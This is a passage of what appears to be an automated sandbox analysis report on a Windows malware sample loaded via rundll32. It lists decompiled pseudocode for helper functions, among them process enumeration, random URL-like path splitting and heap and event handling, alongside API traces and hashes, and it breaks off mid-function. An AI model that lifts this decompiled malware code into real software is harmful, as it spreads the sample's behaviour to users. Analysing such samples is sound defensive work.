                                          • GetLastError.KERNEL32 ref: 0435A2A1
                                            • Part of subcall function 04359D3A: WaitForMultipleObjects.KERNEL32(00000002,0435AA33,00000000,0435AA33,?,?,?,0435AA33,0000EA60), ref: 04359D55
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • GetLastError.KERNEL32(00000000), ref: 0435A2D6
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: e42007504d24719c61248e5711a6b49b0e25787efbc4afea7699a4037ada72c5
                                          • Instruction ID: b1c6a9e321d659fc32b65f0f0afde66756efeccdd2015e63ea98fa5859f69e31
                                          • Opcode Fuzzy Hash: e42007504d24719c61248e5711a6b49b0e25787efbc4afea7699a4037ada72c5
                                          • Instruction Fuzzy Hash: C63145B5A00308EFDB20EFE5D881DAEBBFCEF08304F109669D942A2551D735EA45AF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043554AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E043554AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04354F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04355749(_t23);
						}
					}
					return _t38;
				}
				if(E04359138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x435d2a8, 1, 0,  *0x435d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04359575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0435A642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E0435568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E043572F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x043554ac
                                          0x043554b9
                                          0x043554bf
                                          0x043554c0
                                          0x043554c1
                                          0x043554c2
                                          0x043554c3
                                          0x043554c7
                                          0x043554d3
                                          0x043554d7
                                          0x0435555f
                                          0x0435555f
                                          0x04355562
                                          0x04355564
                                          0x0435556c
                                          0x04355572
                                          0x04355575
                                          0x04355575
                                          0x04355572
                                          0x04355580
                                          0x04355580
                                          0x043554ea
                                          0x043554ec
                                          0x043554ec
                                          0x04355503
                                          0x04355507
                                          0x0435550a
                                          0x04355515
                                          0x0435551c
                                          0x0435551c
                                          0x04355525
                                          0x04355529
                                          0x04355537
                                          0x0435552b
                                          0x0435552b
                                          0x0435552c
                                          0x0435552d
                                          0x0435552e
                                          0x0435552f
                                          0x04355530
                                          0x04355530
                                          0x0435553c
                                          0x0435553f
                                          0x04355543
                                          0x04355545
                                          0x04355545
                                          0x0435554c
                                          0x00000000
                                          0x0435554e
                                          0x0435554e
                                          0x0435555b
                                          0x00000000
                                          0x0435555b

                                          APIs
                                          • CreateEventA.KERNEL32(0435D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 043554FD
                                          • SetEvent.KERNEL32(00000000), ref: 0435550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04355515
                                          • CloseHandle.KERNEL32(00000000), ref: 0435551C
                                            • Part of subcall function 04359575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0435553C,?,0435553C,?,?,?,?,?,0435553C,?), ref: 0435964F
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: f3382ed268036168da4ffc18f88004020b6508042f607b96a41aaddb4ecf7475
                                          • Instruction ID: 1ea09d98fb196954eafffbfe29b2686d9f3e86a280dba7ca043fd742bf742ebe
                                          • Opcode Fuzzy Hash: f3382ed268036168da4ffc18f88004020b6508042f607b96a41aaddb4ecf7475
                                          • Instruction Fuzzy Hash: 87215372D00215BBDB10BFE4D884DAE77AEEF48354F05A825EE12A7114D674FA418FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04354858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04354858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x435d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x435d250; // 0xd5235b88
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x435d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x04354860
                                          0x04354863
                                          0x04354869
                                          0x04354881
                                          0x04354883
                                          0x04354888
                                          0x0435488a
                                          0x0435488d
                                          0x0435488f
                                          0x04354892
                                          0x04354894
                                          0x04354894
                                          0x04354896
                                          0x043548a1
                                          0x043548a6
                                          0x043548b7
                                          0x043548bf
                                          0x043548c4
                                          0x043548c7
                                          0x043548ca
                                          0x043548cc
                                          0x043548cf
                                          0x043548d2
                                          0x043548d2
                                          0x043548d5
                                          0x043548e0
                                          0x043548e5
                                          0x043548ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04354DBF,00000000,?,?,043552FE,?,068795B0), ref: 04354863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0435487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04354DBF,00000000,?,?,043552FE,?,068795B0), ref: 043548BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 043548E0
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: bb280c8dea89d79bcb4f35951c673c853622111285037c534e996b75e41ceb4b
                                          • Instruction ID: bfbe75bd27b312847690d0e117e67571334a9eed17956f2cbd15b7ee9da7d21e
                                          • Opcode Fuzzy Hash: bb280c8dea89d79bcb4f35951c673c853622111285037c534e996b75e41ceb4b
                                          • Instruction Fuzzy Hash: 6D110672A00214AFD314CE69DC85EAEBBEEEB94360F055176F904DB150E774EE40C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04356AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E04356AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04356F89(_t8, _t1);
				_t16 = E043558BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04359038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E043558BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E0435147E(_t16);
				}
				return _t18;
			}









                                          0x04356b02
                                          0x04356b03
                                          0x04356b06
                                          0x04356b08
                                          0x04356b13
                                          0x04356b17
                                          0x04356b1c
                                          0x04356b20
                                          0x04356b28
                                          0x04356b2d
                                          0x04356b35
                                          0x04356b35
                                          0x04356b3e
                                          0x04356b42
                                          0x04356b48
                                          0x04356b4b
                                          0x04356b51
                                          0x04356b51
                                          0x04356b59
                                          0x04356b59
                                          0x04356b60
                                          0x04356b60
                                          0x04356b6b

                                          APIs
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                            • Part of subcall function 04359038: wsprintfA.USER32 ref: 04359094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04352098,74666F53,00000000,?,0435D00C,?,?), ref: 04356B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04356B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04356B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 5d3bbe833364d8ba0bee4876afd2aa944c1823957aaad64d1f7e94be1599b969
                                          • Instruction ID: f6ea470910a3463ae1bb24e746be15c18ba334c00975e7636770b083b248c013
                                          • Opcode Fuzzy Hash: 5d3bbe833364d8ba0bee4876afd2aa944c1823957aaad64d1f7e94be1599b969
                                          • Instruction Fuzzy Hash: BB01D672600205BBDB122BA9DC88EFF7BACEF84359F046420FE1856124DB78E94587E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043556A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E043556A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x435d2a4; // 0x251a5a8
						_t2 = _t9 + 0x435ee38; // 0x73617661
						_push( &_v264);
						if( *0x435d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x043556ad
                                          0x043556b7
                                          0x043556bb
                                          0x043556c5
                                          0x043556f6
                                          0x043556cc
                                          0x043556d1
                                          0x043556de
                                          0x043556e7
                                          0x043556fe
                                          0x043556e9
                                          0x043556f1
                                          0x00000000
                                          0x043556f1
                                          0x043556ff
                                          0x04355700
                                          0x00000000
                                          0x04355700
                                          0x00000000
                                          0x043556fa
                                          0x04355706
                                          0x0435570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 043556B2
                                          • Process32First.KERNEL32(00000000,?), ref: 043556C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 043556F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04355700
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 8de6769bfc809e05fc6cf85636d91026c23d0ce46ec0735d6f385d2f9b4093c7
                                          • Instruction ID: 3b0c4f494d550b6b634cd22ce3f6c25ad6a2ccb0bc7ce7a7dc5fc12343e64b9a
                                          • Opcode Fuzzy Hash: 8de6769bfc809e05fc6cf85636d91026c23d0ce46ec0735d6f385d2f9b4093c7
                                          • Instruction Fuzzy Hash: F7F02B726011657BF720BA369C09EEF76ACDFC9354F003051ED05C3054FA24FA468AA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04357283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04357283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x0435728d
                                          0x04357291
                                          0x043572a6
                                          0x043572a8
                                          0x043572ad
                                          0x043572b3
                                          0x043572b5
                                          0x043572ba
                                          0x043572c5
                                          0x043572bc
                                          0x043572bc
                                          0x043572bc
                                          0x043572ba
                                          0x043572d3

                                          APIs
                                          • memset.NTDLL ref: 04357291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 043572A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 043572B3
                                          • CloseHandle.KERNEL32(?), ref: 043572C5
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: f7ec7b8d21e05e12e1a1c7ab3d864a9fccd770a06b2e01fe2324c05a00948a6e
                                          • Instruction ID: 2b0e96b5d2c94f90889ae794a0ea321e42065c532bd0cb707ad187219bd69a37
                                          • Opcode Fuzzy Hash: f7ec7b8d21e05e12e1a1c7ab3d864a9fccd770a06b2e01fe2324c05a00948a6e
                                          • Instruction Fuzzy Hash: A0F0FEB1104708BFD310AF66ECC4C27BBACEB552A8F11A92EF54282511D676E8054A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435A2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0435A2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E043558BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x0435a2f2
                                          0x0435a2f6
                                          0x0435a2f8
                                          0x0435a2fe
                                          0x0435a302
                                          0x0435a304
                                          0x0435a304
                                          0x0435a306
                                          0x0435a30f
                                          0x0435a313
                                          0x0435a31b
                                          0x0435a32a
                                          0x0435a32f
                                          0x0435a337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04359AA8,00000000,00000005,0435D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 0435A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 0435A31B
                                          • memset.NTDLL ref: 0435A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: cbe1300c1fa3783f61826dbaf412d851a3ddac97dbda1f2801154acf21d71317
                                          • Instruction ID: c3454122ddd3ecd15e2de1905b2494ca318032f338558273a7a392c3ad92bc68
                                          • Opcode Fuzzy Hash: cbe1300c1fa3783f61826dbaf412d851a3ddac97dbda1f2801154acf21d71317
                                          • Instruction Fuzzy Hash: 13E0E573A053116BD630A9B95C88D4F6A9CEFD8264B001935FD15C7214E620EC04C2B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04354C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E04354C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x435d324; // 0x68795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x435d324; // 0x68795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x435d030) {
					HeapFree( *0x435d238, 0, _t8);
				}
				_t14[1] = E04357C75(_v0, _t14);
				_t11 =  *0x435d324; // 0x68795b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x04354c3a
                                          0x04354c3a
                                          0x04354c43
                                          0x04354c53
                                          0x04354c53
                                          0x04354c58
                                          0x04354c5d
                                          0x00000000
                                          0x00000000
                                          0x04354c4d
                                          0x04354c4d
                                          0x04354c5f
                                          0x04354c63
                                          0x04354c75
                                          0x04354c75
                                          0x04354c85
                                          0x04354c88
                                          0x04354c8d
                                          0x04354c91
                                          0x04354c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 04354C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04354C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04354C75
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 04354C91
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 799ef17225ae6e306aec687b45a7c9624eb5e92bceaa5de87f160fef2dc905cd
                                          • Instruction ID: 8e654373979192f7ee86c139af56e3dfd924920250c48752a5a733aa5ceea9a6
                                          • Opcode Fuzzy Hash: 799ef17225ae6e306aec687b45a7c9624eb5e92bceaa5de87f160fef2dc905cd
                                          • Instruction Fuzzy Hash: 7BF0FE70600740ABE7149F68EA48F2A77FCEF68748F04B508F902D7261D728EC80CB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043578AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E043578AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x435d26c; // 0x3d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x435d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x435d26c; // 0x3d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x435d238; // 0x6480000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x043578ad
                                          0x043578b4
                                          0x043578fe
                                          0x04357900
                                          0x04357900
                                          0x043578b8
                                          0x043578be
                                          0x043578c3
                                          0x043578c7
                                          0x043578cd
                                          0x043578d4
                                          0x00000000
                                          0x00000000
                                          0x043578d6
                                          0x043578db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x043578db
                                          0x043578dd
                                          0x043578e5
                                          0x043578e8
                                          0x043578e8
                                          0x043578ee
                                          0x043578f5
                                          0x043578f8
                                          0x043578f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,04356F2D), ref: 043578B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 043578C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 043578E8
                                          • HeapDestroy.KERNEL32(06480000), ref: 043578F8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: a0468ef5911ad6cb3ea5e11e47bf8cfe356eee6aa6c059c71d71801730fbd84c
                                          • Instruction ID: 4638678157395b3d5f064eff6e078a8c64da51d9bf6c5edd756a18c6f26cf014
                                          • Opcode Fuzzy Hash: a0468ef5911ad6cb3ea5e11e47bf8cfe356eee6aa6c059c71d71801730fbd84c
                                          • Instruction Fuzzy Hash: 84F03071A0131197E7105A75E949F667B9DEB0D761F147510BC04D7690DF38EC40D6A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04359B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04359B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x435d324; // 0x68795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x435d324; // 0x68795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x435d324; // 0x68795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x435e845) {
					HeapFree( *0x435d238, 0, _t10);
					_t7 =  *0x435d324; // 0x68795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x04359b10
                                          0x04359b19
                                          0x04359b29
                                          0x04359b29
                                          0x04359b2e
                                          0x04359b33
                                          0x00000000
                                          0x00000000
                                          0x04359b23
                                          0x04359b23
                                          0x04359b35
                                          0x04359b3a
                                          0x04359b3e
                                          0x04359b51
                                          0x04359b57
                                          0x04359b57
                                          0x04359b60
                                          0x04359b62
                                          0x04359b66
                                          0x04359b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 04359B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04359B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04359B51
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 04359B66
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 448faf4a93e84f0e7fa0d4e911cfa32dc70abad128fb02012fa6c799a51962f1
                                          • Instruction ID: 4eba4afd74392ca6bd3a1f3cc9c1c57af4a48666da6be2f6d437dafc08d70f9c
                                          • Opcode Fuzzy Hash: 448faf4a93e84f0e7fa0d4e911cfa32dc70abad128fb02012fa6c799a51962f1
                                          • Instruction Fuzzy Hash: C3F062B4601300DBEB189B64EA59F2937EDEB1C705F45B018E906DB660D628EC40DA15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04356B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04356B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
